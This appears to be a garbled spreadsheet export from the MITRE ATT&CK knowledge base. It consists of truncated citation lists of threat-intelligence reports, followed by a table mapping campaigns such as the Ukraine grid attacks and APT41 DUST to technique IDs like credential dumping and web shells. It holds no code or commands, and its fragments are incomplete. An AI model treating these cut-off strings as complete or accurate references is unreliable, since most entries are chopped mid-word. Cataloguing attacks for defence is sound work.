icro Pawn Storm Dec 2020),(Citation: Nccgroup Gh0st April 2018),(Citation: ESET Turla Lunar toolset May 2024),(Citation: Trend Micro Qak
6),(Citation: Bitsight Latrodectus June 2024),(Citation: Trend Micro FIN6 October 2019),(Citation: PTSecurity Cobalt Group Aug 2017),(Citati

20),(Citation: Netskope Squirrelwaffle Oct 2021),(Citation: ESET Exchange Mar 2021),(Citation: ESET Turla Lunar toolset May 2024),(Citatio

t Strike September 2020),(Citation: TrendMicro MacOS April 2018),(Citation: ClearSky MuddyWater Nov 2018),(Citation: Cyber Forensicat
),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Google EXOTIC LILY March 2022),(Citation: Morphisec Cobalt G
ULMEDIA October 2020),(Citation: Crowdstrike HuntReport 2022),(Citation: GitHub PowerSploit May 2012),(Citation: ESET OceanLotus Mar

038A PRC Critical Infrastructure February 2024),(Citation: Cybereason Kimsuky November 2020),(Citation: objsee mac malware 2017),(Cita

ti Zero-Day Exploitation January 2024),(Citation: Zscaler Lyceum DnsSystem June 2022),(Citation: Unit 42 MechaFlounder March 2019),(Cit
er 2022),(Citation: Kaspersky Sodin July 2019),(Citation: KillDisk Ransomware),(Citation: apt41_dcsocytec_dec2022),(Citation: Sentinel Labs

ist Dtrack),(Citation: US-CERT TA18-074A),(Citation: Kaspersky Ferocious Kitten Jun 2021),(Citation: Unit 42 OopsIE! Feb 2018),(Citation: Pa

(Citation: Mandiant FIN12 Oct 2021),(Citation: Microsoft Actinium February 2022),(Citation: US District Court Indictment GRU Unit 74455
n: SecureWorks August 2019),(Citation: SentinelOne Agrius 2021),(Citation: Volexity InkySquid RokRAT August 2021),(Citation: MSTIC NOBE

ow Integrity)

ct 2020),(Citation: Google Cloud APT41 2024),(Citation: Gigamon BADHATCH Jul 2019),(Citation: Bishop Fox Sliver Framework August 2019
42 Lucifer June 2020),(Citation: ESET Zebrocy May 2019),(Citation: Group IB GrimAgent July 2021),(Citation: Zscaler APT31 Covid-19 Octob
ay 2022),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Trend Micro Iron Tiger April 2021),(Citation: Profero AP
2018),(Citation: Volexity Ivanti Zero-Day Exploitation January 2024),(Citation: DigiTrust NanoCore Jan 2017),(Citation: Cisco Talos Intelligen

ress INC Ransomware May 2024),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: Cylance Shaheen Nov 2018),(Citation:

17),(Citation: McAfee Night Dragon),(Citation: Talos Seduploader Oct 2017),(Citation: ESET Attor Oct 2019),(Citation: Symantec Vasport Ma
n: Qualys Hermetic Wiper March 2022),(Citation: Sophos Netwalker May 2020),(Citation: Ready.gov IT DRP),(Citation: Unit 42 Palo Alto Ra

antec Remsec IOCs),(Citation: Cofense RevengeRAT Feb 2019),(Citation: Symantec W32.Duqu),(Citation: Unit 42 Nokki Oct 2018),(Citation
Lambert for OSX Oct 2021),(Citation: Google Cloud APT41 2024),(Citation: ESET Telebots Dec 2016),(Citation: Fysbis Dr Web Analysis),(Cit
ampaign February 2023),(Citation: MacKeeper Bundlore Apr 2019),(Citation: Dragos Crashoverride 2017),(Citation: Kaspersky ToddyCat Ch

rosoft BlackCat Jun 2022),(Citation: Microsoft Reg),(Citation: Kaspersky ShadowPad Aug 2017),(Citation: Nccgroup Emissary Panda May 20

ToddyCat Check Logs October 2023),(Citation: Hornet Security Avaddon June 2020),(Citation: Lazarus APT January 2022),(Citation: NTT Sec

tion: trendmicro_redcurl),(Citation: Baumgartner Naikon 2015),(Citation: GitHub PoshC2),(Citation: Symantec Leafminer July 2018),(Citati
Chien February 2011),(Citation: FireEye FiveHands April 2021),(Citation: Mcafee Clop Aug 2019),(Citation: ESET InvisiMole June 2018),(Cit

October 2019),(Citation: CheckPoint Naikon May 2020),(Citation: ESET InvisiMole June 2020),(Citation: SentinelOne Lazarus macOS July 202

n: Cadet Blizzard emerges as novel threat actor),(Citation: FireEye APT39 Jan 2019),(Citation: Microsoft GALLIUM December 2019),(Citation

0),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: CarbonBlack Conti July 2020),(Citation: Malwarebytes Kimsuky June 2021)

tation: Rewterz Sidewinder APT April 2020),(Citation: Trend Micro Ransomware Spotlight Play July 2023),(Citation: FireEye Ryuk and Trickb

c Security Center Trojan.Kwampirs),(Citation: Secureworks Gold Prelude Profile),(Citation: Intel 471 REvil March 2020),(Citation: ZScaler Sq

qin Dragon June 2022),(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024),(Citation: Unit 42 OopsIE! Feb 2018),(Citation:

Citation: NCC Group LAPSUS Apr 2022),(Citation: Microsoft Prestige ransomware October 2022),(Citation: Sygnia Emperor Dragonfly Octob
relwaffle Oct 2021),(Citation: Bitdefender Agent Tesla April 2020),(Citation: Trend Micro Qakbot May 2020),(Citation: Proofpoint TA459 Ap
pril 2020),(Citation: AADInternals Documentation),(Citation: CISA AppleJeus Feb 2021),(Citation: Talos Oblique RAT March 2021),(Citation

ation: Talos NavRAT May 2018),(Citation: SecureList SynAck Doppelgänging May 2018),(Citation: Trend Micro Tick November 2019),(Citati
ation: Bishop Fox Sliver Framework August 2019),(Citation: Malwarebytes RokRAT VBA January 2021),(Citation: PaloAlto CardinalRat Apr 2

0),(Citation: ESET Carberp March 2012),(Citation: ESET Carbon Mar 2017),(Citation: DFIR Ryuk 2 Hour Speed Run November 2020),(Citation

POLONIUM June 2022),(Citation: University of Birmingham C2)

tion: US-CERT Volgmer 2 Nov 2017),(Citation: Unit42 BabyShark Feb 2019),(Citation: ESET Attor Oct 2019),(Citation: FoxIT Wocao Decembe
e May 2024),(Citation: PWC Cloud Hopper April 2017),(Citation: Cylance Shaheen Nov 2018),(Citation: Costa AvosLocker May 2022),(Citati

,(Citation: Kaspersky ProjectSauron Technical Analysis),(Citation: Nltest Manual),(Citation: apt41_dcsocytec_dec2022),(Citation: FireEye FI

Citation: DHS/CISA Ransomware Targeting Healthcare October 2020),(Citation: Symantec Buckeye),(Citation: Prevailion DarkWatchman 20

rocy May 2019),(Citation: MalwareBytes WoodyRAT Aug 2022),(Citation: Unit 42 DarkHydrus July 2018),(Citation: TrendMicro Ursnif Mar
on: Secureworks GOLD KINGSWOOD September 2018),(Citation: Kaspersky ProjectSauron Technical Analysis),(Citation: Ensilo Darkgate 20

Hermetic Wiper March 2022),(Citation: CheckPoint Bandook Nov 2020),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation:
uploader Oct 2017),(Citation: ESET Attor Oct 2019),(Citation: Elastic Latrodectus May 2024),(Citation: Rancor Unit42 June 2018),(Citation:

e Cedar Jan 2021),(Citation: Microsoft GALLIUM December 2019),(Citation: CISA MAR-10288834-2.v1 TAINTEDSCRIBE MAY 2020),(Citation

d Prelude Profile),(Citation: ZScaler Squirrelwaffle Sep 2021),(Citation: Lotus Blossom Jun 2015),(Citation: Cybereason Cobalt Kitty 2017),(C

s BRONZE UNION June 2017),(Citation: FoxIT Wocao December 2019),(Citation: TrendMicro EarthLusca 2022),(Citation: GitHub Sliver Nets
ctober 2020),(Citation: ESET Gelsemium June 2021),(Citation: TrendMicro RaspberryRobin 2022),(Citation: Microsoft Analyzing Solorigate

arch 2022),(Citation: CISA MAR SLOTHFULMEDIA October 2020),(Citation: Sophos Netwalker May 2020),(Citation: win10_asr)

ET GreyEnergy Oct 2018),(Citation: ATT Sidewinder January 2021),(Citation: Cofense Astaroth Sept 2018),(Citation: Trend Micro Conficker
n: Proofpoint TA459 April 2017),(Citation: ESET Nomadic Octopus 2018),(Citation: ESET Machete July 2019),(Citation: Unit 42 CARROTBAT

itation: McAfee Night Dragon),(Citation: MSTIC NOBELIUM May 2021),(Citation: Microsoft Ransomware as a Service),(Citation: Unit 42 NE
re Advisory December 2023),(Citation: Anomali Linux Rabbit 2018),(Citation: CyberBit Dtrack),(Citation: US-CERT Ukraine Feb 2016),(Citatio

,(Citation: Kaspersky Lab SynAck May 2018),(Citation: ESET InvisiMole June 2020),(Citation: Medium Ali Salem Bumblebee April 2022),(Cita

an 2021),(Citation: ESET Hermetic Wizard March 2022),(Citation: Novetta Blockbuster RATs),(Citation: Microsoft BlackCat Jun 2022),(Citati
FireEye APT29 Nov 2018),(Citation: DOJ APT10 Dec 2018),(Citation: Trellix Darkgate 2023),(Citation: Checkpoint IndigoZebra July 2021),(Cit
0),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: Dell TG-3390),(Citation: ClearSky Wilted Tulip July 2017),

k August 2019),(Citation: Medium S2W WhisperGate January 2022),(Citation: Accenture HyperStack October 2020),(Citation: Talos Cobalt

19),(Citation: Kaspersky Cloud Atlas August 2019),(Citation: Secureworks BRONZE PRESIDENT December 2019),(Citation: Volexity SolarWin

24),(Citation: Trend Micro Qakbot May 2020),(Citation: ESET Trickbot Oct 2020),(Citation: Lotus Blossom Jun 2015),(Citation: Cybereason C
Cobalt Group Aug 2017),(Citation: Kaspersky Adwind Feb 2016),(Citation: Elastic Pikabot 2024),(Citation: ESET InvisiMole June 2020),(Citati

nar toolset May 2024),(Citation: NCC Group Chimera January 2021),(Citation: Proofpoint TA459 April 2017),(Citation: ESET Nomadic Octop

18),(Citation: Cyber Forensicator Silence Jan 2019),(Citation: Unit42 Xbash Sept 2018),(Citation: Check Point APT34 April 2021),(Citation: M
,(Citation: Morphisec Cobalt Gang Oct 2018),(Citation: Kaspersky ToddyCat June 2022),(Citation: Talos GravityRAT),(Citation: Symantec Lin
st 2021),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: Unit42 Molerat Mar 2020),(Citation: FireEye APT29 Nov 2018),(Citation: Elastic P

Sliver Framework August 2019),(Citation: Accenture HyperStack October 2020),(Citation: Group IB Cobalt Aug 2017),(Citation: Check Point
Zscaler APT31 Covid-19 October 2020),(Citation: Talos Cobalt Strike September 2020),(Citation: MalwareBytes WoodyRAT Aug 2022),(Cita
ril 2021),(Citation: Profero APT27 December 2020),(Citation: ESET Twitter Ida Pro Nov 2021),(Citation: FinFisher Citation),(Citation: Micros
Citation: Cisco Talos Intelligence Group),(Citation: McAfee Gold Dragon),(Citation: Unit 42 Rocke January 2019),(Citation: PaloAlto NanoCo

Shaheen Nov 2018),(Citation: NCCGroup RokRat Nov 2018),(Citation: Securelist WhiteBear Aug 2017),(Citation: Talos Promethium June 20

Citation: Symantec Vasport May 2012),(Citation: Volexity Ivanti Zero-Day Exploitation January 2024),(Citation: Unit 42 MechaFlounder Mar
,(Citation: Unit 42 Palo Alto Ransomware in Public Clouds 2022),(Citation: reagentc_cmd)

t 42 Nokki Oct 2018),(Citation: Microsoft NICKEL December 2021),(Citation: Cylance Machete Mar 2017),(Citation: Proofpoint NETWIRE De
n: Fysbis Dr Web Analysis),(Citation: FireEye APT10 April 2017),(Citation: HP SVCReady Jun 2022),(Citation: ASERT InnaputRAT April 2018),(
tation: Kaspersky ToddyCat Check Logs October 2023),(Citation: US-CERT BLINDINGCAN Aug 2020),(Citation: Trend Micro Skidmap),(Citatio

group Emissary Panda May 2018),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: Talos Cobalt Strike September 2020),(Citation:

nuary 2022),(Citation: NTT Security Flagpro new December 2021),(Citation: Uptycs Warzone UAC Bypass November 2020),(Citation: ESET H

ec Leafminer July 2018),(Citation: Palo Alto Black-T October 2020),(Citation: Microsoft Albanian Government Attacks September 2022),(Cit
SET InvisiMole June 2018),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: TrendMicro TropicTrooper 2015),(Citation: Windo

elOne Lazarus macOS July 2020),(Citation: CheckPoint Bandook Nov 2020),(Citation: Google TAG COLDRIVER January 2024),(Citation: Palo

IUM December 2019),(Citation: NCC Group APT15 Alive and Strong),(Citation: Unit 42 MuddyWater Nov 2017),(Citation: Trend Micro Emo

warebytes Kimsuky June 2021),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: McAfee Cuba April 2021),(Citation: Group IB GrimA

tation: FireEye Ryuk and Trickbot January 2019),(Citation: TrendMicro Patchwork Dec 2017),(Citation: Cybereason TA505 April 2019),(Cita

rch 2020),(Citation: ZScaler Squirrelwaffle Sep 2021),(Citation: TrendMicro Tropic Trooper Mar 2018),(Citation: Lotus Blossom Jun 2015),(C

2 OopsIE! Feb 2018),(Citation: Cybereason Kimsuky November 2020),(Citation: Trend Micro Emotet Jan 2019),(Citation: FireEye APT39 Jan

gnia Emperor Dragonfly October 2022),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: McAfee Night Dragon),(Citation
Citation: Proofpoint TA459 April 2017),(Citation: ESET Nomadic Octopus 2018),(Citation: ESET Machete July 2019),(Citation: Securelist Sof
ue RAT March 2021),(Citation: Kaspersky LuminousMoth July 2021),(Citation: TrendMicro EarthLusca 2022),(Citation: Proofpoint Bumbleb

o Tick November 2019),(Citation: Cybereason Bazar July 2020),(Citation: Symantec Pasam May 2012),(Citation: Cisco Talos Bitter Banglade
on: PaloAlto CardinalRat Apr 2017),(Citation: SentinelLabs Metador Sept 2022),(Citation: Group IB Cobalt Aug 2017),(Citation: Trend Micro

Run November 2020),(Citation: Cybereason Conti Jan 2021),(Citation: TrendMicro Netwalker May 2020),(Citation: Lazarus RATANKBA),

tation: FoxIT Wocao December 2019),(Citation: McAfee Gold Dragon),(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021),(Citation
AvosLocker May 2022),(Citation: Crowdstrike HuntReport 2022),(Citation: Windows RDP Sessions),(Citation: Berkley Secure)

_dec2022),(Citation: FireEye FIN6 April 2016),(Citation: Charles McLellan March 2016),(Citation: Aqua Kinsing April 2020),(Citation: FoxIT W

: Prevailion DarkWatchman 2021),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: KISA Operation Muzabi),(Citation: BlackBer

ation: TrendMicro Ursnif Mar 2015),(Citation: Kandji Cuckoo April 2024),(Citation: Unit 42 Nokki Oct 2018),(Citation: Unit42 Azorult Nov 20
s),(Citation: Ensilo Darkgate 2018),(Citation: Elastic Latrodectus May 2024),(Citation: Cybereason Valak May 2020),(Citation: FoxIT Wocao D

oor December 2020),(Citation: Group IB Silence Aug 2019),(Citation: Symantec Ukraine Wipers February 2022),(Citation: Securelist WhiteB
(Citation: Unit 42 CARROTBAT January 2020),(Citation: TrendMicro Pikabot 2024),(Citation: ZScaler Squirrelwaffle Sep 2021),(Citation: SCIL

Service),(Citation: Unit 42 NETWIRE April 2020),(Citation: CERT-UA WinterVivern 2023),(Citation: CISA AppleJeus Feb 2021),(Citation: ESET
ERT Ukraine Feb 2016),(Citation: FireEye TRITON 2019),(Citation: Group IB Silence Sept 2018),(Citation: Mandiant_UNC2165),(Citation: MS

m Bumblebee April 2022),(Citation: Check Point Black Basta October 2022),(Citation: Unit 42 BadPatch Oct 2017),

soft BlackCat Jun 2022),(Citation: Novetta Blockbuster),(Citation: eSentire FIN7 July 2021),(Citation: Cisco Talos Avos Jun 2022),(Citation: N
int IndigoZebra July 2021),(Citation: CISA AA21-200A APT40 July 2021),(Citation: Microsoft Targeting Elections September 2020),
Tulip July 2017),

2020),(Citation: Talos Cobalt Group July 2018),(Citation: Symantec Shuckworm January 2022),(Citation: Morphisec ShellTea June 2019),(C

9),(Citation: Volexity SolarWinds),(Citation: Huntress INC Ransom Group August 2023),(Citation: Google Cloud APT41 2024),(Citation: CISA

2015),(Citation: Cybereason Cobalt Kitty 2017),(Citation: ATT TeamTNT Chimaera September 2020),(Citation: ESET Casbaneiro Oct 2019),(
ET InvisiMole June 2020),(Citation: Malwarebytes Higaisa 2020),(Citation: Flashpoint FIN 7 March 2019),(Citation: win10_asr)

Citation: ESET Nomadic Octopus 2018),(Citation: Cybereason Soft Cell June 2019),(Citation: ESET ComRAT May 2020),(Citation: FireEye APT

APT34 April 2021),(Citation: McAfee Sharpshooter December 2018),(Citation: Symantec Bumblebee June 2022),(Citation: fsecure NanHaiS
tyRAT),(Citation: Symantec Linfo May 2012),(Citation: Cisco DNSMessenger March 2017),(Citation: Mandiant_UNC2165),(Citation: Mandia
9 Nov 2018),(Citation: Elastic Pikabot 2024),(Citation: Gh0stRAT ATT March 2019),(Citation: ProofPoint Ursnif Aug 2016),(Citation: Sophos N

ug 2017),(Citation: Check Point Pay2Key November 2020),(Citation: ESET Sednit Part 2),(Citation: Intezer Doki July 20),(Citation: Kaspersky
tes WoodyRAT Aug 2022),(Citation: JPCERT ChChes Feb 2017),(Citation: Check Point APT34 April 2021),(Citation: Symantec W32.Duqu),(Ci
sher Citation),(Citation: Microsoft FinFisher March 2018),(Citation: TrendMicro Patchwork Dec 2017),(Citation: Forcepoint Monsoon),(Citati
SERT InnaputRAT April 2018),(Citation: McAfee Shamoon December 2018),(Citation: Microsoft SAM),(Citation: ESET Okrum July 2019),(Cit
Trend Micro Skidmap),(Citation: Arghire LazyScripter),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: Symantec Tick Apr 201

ke September 2020),(Citation: ESET LoJax Sept 2018),(Citation: FireEye Shamoon Nov 2016),(Citation: Microsoft NICKEL December 2021),(C

vember 2020),(Citation: ESET Hermetic Wizard March 2022),(Citation: Talos Bisonal Mar 2020),(Citation: BlackBerry CostaRicto November

Attacks September 2022),(Citation: DFIR Phosphorus November 2021),(Citation: Anomali Rocke March 2019),(Citation: Kaspersky ThreatN
Trooper 2015),(Citation: Windows Anonymous Enumeration of SAM Accounts)

R January 2024),(Citation: Palo Alto Reaver Nov 2017),(Citation: SentinelLabs Metador Sept 2022),(Citation: NSA/FBI Drovorub August 2020

7),(Citation: Trend Micro Emotet Jan 2019),(Citation: SentinelLabs Metador Technical Appendix Sept 2022),(Citation: group-ib_redcurl1),(C

021),(Citation: Group IB GrimAgent July 2021),(Citation: Talos Cobalt Strike September 2020),(Citation: Cyberreason Anchor December 201

eason TA505 April 2019),(Citation: Microsoft Iranian Threat Actor Trends November 2021),(Citation: Unit 42 Magic Hound Feb 2017),(Citati

on: Lotus Blossom Jun 2015),(Citation: Cybereason Cobalt Kitty 2017),(Citation: SCILabs Malteiro 2021),(Citation: ESET Casbaneiro Oct 2019

9),(Citation: FireEye APT39 Jan 2019),(Citation: Securelist BlackOasis Oct 2017),(Citation: FireEye SUNSHUTTLE Mar 2021),(Citation: Proofpo

McAfee Night Dragon),(Citation: SecureList Silence Nov 2017),(Citation: Mandiant Cutting Edge Part 3 February 2024),(Citation: SecureWor
2019),(Citation: Securelist Sofacy Feb 2018),(Citation: TrendMicro Pikabot 2024),(Citation: SCILabs Malteiro 2021),(Citation: Cybereason C
(Citation: Proofpoint Bumblebee April 2022),(Citation: Secureworks Cobalt Gypsy Feb 2017),(Citation: CrowdStrike Wizard Spider October

on: Cisco Talos Bitter Bangladesh May 2022),(Citation: Cylance Shell Crew Feb 2017),(Citation: Trusteer Carberp October 2010),(Citation: Se
g 2017),(Citation: Trend Micro Waterbear December 2019),(Citation: Trend Micro Black Basta October 2022),(Citation: Booz Allen Hamilto

ation: Lazarus RATANKBA),

AIDOOR August 2021),(Citation: Securelist APT10 March 2021),(Citation: FireEye FELIXROOT July 2018),(Citation: US-CERT TA18-074A),(Cita
2020),(Citation: FoxIT Wocao December 2019),(Citation: Unit42 DarkHydrus Jan 2019),(Citation: Cisco Talos Intelligence Group),(Citation: M

2),(Citation: Securelist WhiteBear Aug 2017),(Citation: ClearSky Wilted Tulip July 2017),(Citation: Kaspersky Turla),
f Aug 2016),(Citation: Sophos Netwalker May 2020),(Citation: Trend Micro Tick November 2019),(Citation: Cybereason Bazar July 2020),(Ci

i July 20),(Citation: Kaspersky Dridex May 2017),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: CISA WellMail July 2020),(Citation: CISA
tion: Symantec W32.Duqu),(Citation: Lunghi Iron Tiger Linux),(Citation: Unit42 Azorult Nov 2018),(Citation: Check Point APT35 CharmPowe
n: Forcepoint Monsoon),(Citation: Palo Alto T9000 Feb 2016),(Citation: MalwareBytes SideCopy Dec 2021),(Citation: FireEye DLL Side-Load
on: ESET Okrum July 2019),(Citation: Tarrask scheduled task),(Citation: Minerva Labs Black Basta May 2022),(Citation: Bitdefender FunnyDr
tation: Symantec Tick Apr 2016),(Citation: ESET Hermetic Wizard March 2022),(Citation: Talos Bisonal Mar 2020),(Citation: Mandiant APT2

soft NICKEL December 2021),(Citation: Check Point APT35 CharmPower January 2022),(Citation: Crowdstrike Indrik November 2018),(Citati

ckBerry CostaRicto November 2020),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: CarbonBlack Conti July 2020),(Citation:

9),(Citation: Kaspersky ThreatNeedle Feb 2021),(Citation: FireEye APT34 Webinar Dec 2017),
NSA/FBI Drovorub August 2020),(Citation: ESET DazzleSpy Jan 2022),(Citation: Check Point Pay2Key November 2020),(Citation: CISA GRU29

Citation: group-ib_redcurl1),(Citation: Dragos Crashoverride 2018),(Citation: ESET GreyEnergy Oct 2018),(Citation: Symantec Elfin Mar 201

reason Anchor December 2019),(Citation: FireEye APT41 March 2020),(Citation: Unit 42 Nokki Oct 2018),(Citation: Microsoft NICKEL Dece

Magic Hound Feb 2017),(Citation: Talos MuddyWater May 2019),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: FireEye APT29 Nov 201

tion: ESET Casbaneiro Oct 2019),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: SCILabs Malteiro Threat Overlap 2023),(

E Mar 2021),(Citation: Proofpoint ZeroT Feb 2017),(Citation: Cybereason Astaroth Feb 2019),(Citation: Mcafee Clop Aug 2019),(Citation: M

ry 2024),(Citation: SecureWorks BRONZE STARLIGHT Ransomware Operations June 2022),(Citation: Bitdefender Sardonic Aug 2021),(Citati
ybereason Bazar July 2020),(Citation: Cisco Talos Bitter Bangladesh May 2022),(Citation: NHS Digital Egregor Nov 2020),(Citation: ANSSI Sa

Mail July 2020),(Citation: CISA WellMess July 2020),(Citation: Github Covenant),(Citation: Talos PoetRAT April 2020),(Citation: FireEye APT2
heck Point APT35 CharmPower January 2022),(Citation: Proofpoint TA416 Europe March 2022),(Citation: group-ib_redcurl2),(Citation: ESE
Citation: FireEye DLL Side-Loading)
er 2020),(Citation: CISA GRU29155 2024),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Kaspersky ToddyCat Ju

tation: Symantec Elfin Mar 2019),(Citation: Microsoft Moonstone Sleet 2024),(Citation: ESET Telebots Dec 2016),(Citation: ESET Telebots Ju

tation: Microsoft NICKEL December 2021),(Citation: Proofpoint TA416 Europe March 2022),(Citation: group-ib_redcurl2),(Citation: Mandia

tation: FireEye APT29 Nov 2018),(Citation: ESET Gamaredon June 2020),(Citation: Costa AvosLocker May 2022),(Citation: Flashpoint FIN 7

alteiro Threat Overlap 2023),(Citation: Unit 42 CARROTBAT November 2018),(Citation: Group IB Ransomware May 2020),(Citation: ESET La

ee Clop Aug 2019),(Citation: Medium Babuk February 2021),(Citation: Malwarebytes Dyreza November 2015),(Citation: Dragos Crashoverr

der Sardonic Aug 2021),(Citation: Securelist DarkVishnya Dec 2018),(Citation: FireEye TEMP.Veles 2018),(Citation: Zscaler Lyceum DnsSyst
Nov 2020),(Citation: ANSSI Sandworm January 2021),(Citation: Intezer HiddenWasp Map 2019),(Citation: Kaspersky MoleRATs April 2019)

l 2020),(Citation: FireEye APT29 Nov 2018),(Citation: FireEye APT34 Webinar Dec 2017),
oup-ib_redcurl2),(Citation: ESET InvisiMole June 2018),(Citation: Bitdefender Naikon April 2021),(Citation: ESET Kobalos Jan 2021),(Citation
tation: Kaspersky ToddyCat June 2022),(Citation: Microsoft HAFNIUM March 2020),(Citation: Profero APT27 December 2020),(Citation: Ka

016),(Citation: ESET Telebots June 2017),(Citation: Impacket Tools),(Citation: CISA GRU29155 2024),(Citation: ESET Okrum July 2019),(Citati

ib_redcurl2),(Citation: Mandiant ROADSWEEP August 2022),(Citation: BlackBerry Bahamut),(Citation: Trellix Darkgate 2023),(Citation: Dell

22),(Citation: Flashpoint FIN 7 March 2019),(Citation: Sophos Netwalker May 2020),(Citation: Microsoft ASR Obfuscation)

e May 2020),(Citation: ESET Lazarus Jun 2020),(Citation: Unit42 OilRig Playbook 2023),(Citation: Aqua TeamTNT August 2020),(Citation: Se

5),(Citation: Dragos Crashoverride 2018),(Citation: ESET GreyEnergy Oct 2018),(Citation: MoustachedBouncer ESET August 2023),(Citation:

ation: Zscaler Lyceum DnsSystem June 2022),(Citation: RedCanary Mockingbird May 2020),(Citation: SentinelOne INC Ransomware),(Citati
source IDsource namesource refsource type
mapping typetarget IDtarget nametarget ref targetmapping
type description
C0028 2015 Ukraicampaign--campaign uses T1562.001Disable or attack-pat technique During the
C0028 2015 Ukraicampaign--campaign uses T1136.002Domain Acattack-pat technique During the
C0028 2015 Ukraicampaign--campaign uses T1133 External R attack-pat technique During the
C0028 2015 Ukraicampaign--campaign uses T1070.004File Deleti attack-pat technique During the
C0028 2015 Ukraicampaign--campaign uses T1105 Ingress Tooattack-pat technique During the
C0028 2015 Ukraicampaign--campaign uses T1056.001Keyloggingattack-pat technique During the
C0028 2015 Ukraicampaign--campaign uses T1570 Lateral Tooattack-pat technique During the
C0028 2015 Ukraicampaign--campaign uses T1204.002Malicious Fattack-pat technique During the
C0028 2015 Ukraicampaign--campaign uses T1112 Modify Regattack-pat technique During the
C0028 2015 Ukraicampaign--campaign uses T1040 Network Snattack-pat technique During the
C0028 2015 Ukraicampaign--campaign uses T1055 Process Injattack-pat technique During the
C0028 2015 Ukraicampaign--campaign uses T1018 Remote Sysattack-pat technique During the
C0028 2015 Ukraicampaign--campaign uses T1218.011Rundll32 attack-pat technique During the
C0028 2015 Ukraicampaign--campaign uses T1566.001Spearphishattack-pat technique During the
C0028 2015 Ukraicampaign--campaign uses T1078 Valid Acco attack-pat technique During the
C0028 2015 Ukraicampaign--campaign uses T1059.005Visual Basiattack-pat technique During the
C0028 2015 Ukraicampaign--campaign uses T1071.001Web Protocattack-pat technique During the
C0025 2016 Ukraicampaign- campaign uses T1098 Account Ma attack-pat technique During the
C0025 2016 Ukraicampaign- campaign uses T1110 Brute Forc attack-pat technique During the
C0025 2016 Ukraicampaign- campaign uses T1554 Compromise attack-pat technique During the
C0025 2016 Ukraicampaign- campaign uses T1136 Create Accattack-pat technique During the
C0025 2016 Ukraicampaign- campaign uses T1562.002Disable Wiattack-pat technique During the
C0025 2016 Ukraicampaign- campaign uses T1136.002Domain Acattack-pat technique During the
C0025 2016 Ukraicampaign- campaign uses T1003.001LSASS Memattack-pat technique During the
C0025 2016 Ukraicampaign- campaign uses T1570 Lateral Tooattack-pat technique During the
C0025 2016 Ukraicampaign- campaign uses T1036.010Masqueradattack-pat technique During the
C0025 2016 Ukraicampaign- campaign uses T1036.008Masquerade attack-pat technique During the
C0025 2016 Ukraicampaign- campaign uses T1036.005Match Legiattack-pat technique During the
C0025 2016 Ukraicampaign- campaign uses T1027 Obfuscatedattack-pat technique During the
C0025 2016 Ukraicampaign- campaign uses T1059.001PowerShellattack-pat technique During the
C0025 2016 Ukraicampaign- campaign uses T1018 Remote Sysattack-pat technique During the
C0025 2016 Ukraicampaign- campaign uses T1021.002SMB/Windo attack-pat technique During the
C0025 2016 Ukraicampaign- campaign uses T1505.001SQL Storedattack-pat technique During the
C0025 2016 Ukraicampaign- campaign uses T1027.002Software Pattack-pat technique During the
C0025 2016 Ukraicampaign- campaign uses T1059.005Visual Basiattack-pat technique During the
C0025 2016 Ukraicampaign- campaign uses T1059.003Windows Cattack-pat technique During the
C0025 2016 Ukraicampaign- campaign uses T1047 Windows M attack-pat technique During the
C0025 2016 Ukraicampaign- campaign uses T1543.003Windows Se attack-pat technique During the
C0034 2022 Ukraicampaign- campaign uses T1485 Data Destrattack-pat technique During the
C0034 2022 Ukraicampaign- campaign uses T1484.001Group Poliattack-pat technique During the
C0034 2022 Ukraicampaign- campaign uses T1570 Lateral Tooattack-pat technique During the
C0034 2022 Ukraicampaign- campaign uses T1036.004Masquerade attack-pat technique During the
C0034 2022 Ukraicampaign- campaign uses T1095 Non-Applicattack-pat technique During the
C0034 2022 Ukraicampaign- campaign uses T1059.001PowerShellattack-pat technique During the
C0034 2022 Ukraicampaign- campaign uses T1572 Protocol T attack-pat technique During the
C0034 2022 Ukraicampaign- campaign uses T1053.005Scheduled attack-pat technique During the
C0034 2022 Ukraicampaign- campaign uses T1543.002Systemd Seattack-pat technique During the
C0034 2022 Ukraicampaign- campaign uses T1505.003Web Shell attack-pat technique During the
C0040 APT41 DUScampaign- campaign uses T1560.001Archive viaattack-pat technique [APT41 DUST
C0040 APT41 DUScampaign- campaign uses T1573.002Asymmetricattack-pat technique [APT41 DUS
C0040 APT41 DUScampaign- campaign uses T1119 Automatedattack-pat technique [APT41 DUS
C0040 APT41 DUScampaign- campaign uses T1586.003Cloud Accoattack-pat technique [APT41 DUS
C0040 APT41 DUScampaign- campaign uses T1553.002Code Signi attack-pat technique [APT41 DUS
C0040 APT41 DUScampaign- campaign uses T1588.003Code Signinattack-pat technique [APT41 DUS
C0040 APT41 DUScampaign- campaign uses T1574.001DLL Searchattack-pat technique [APT41 DUS
C0040 APT41 DUScampaign- campaign uses T1574.002DLL Side-L attack-pat technique [APT41 DUS
C0040 APT41 DUScampaign- campaign uses T1213 Data from attack-pat technique [APT41 DUS
C0040 APT41 DUScampaign- campaign uses T1027.013Encrypted/attack-pat technique [APT41 DUS
C0040 APT41 DUScampaign- campaign uses T1567.002Exfiltratio attack-pat technique [APT41 DUS
C0040 APT41 DUScampaign- campaign uses T1070.004File Deleti attack-pat technique [APT41 DUST
C0040 APT41 DUScampaign- campaign uses T1105 Ingress Tooattack-pat technique [APT41 DUS
C0040 APT41 DUScampaign- campaign uses T1074.001Local Data attack-pat technique [APT41 DUST
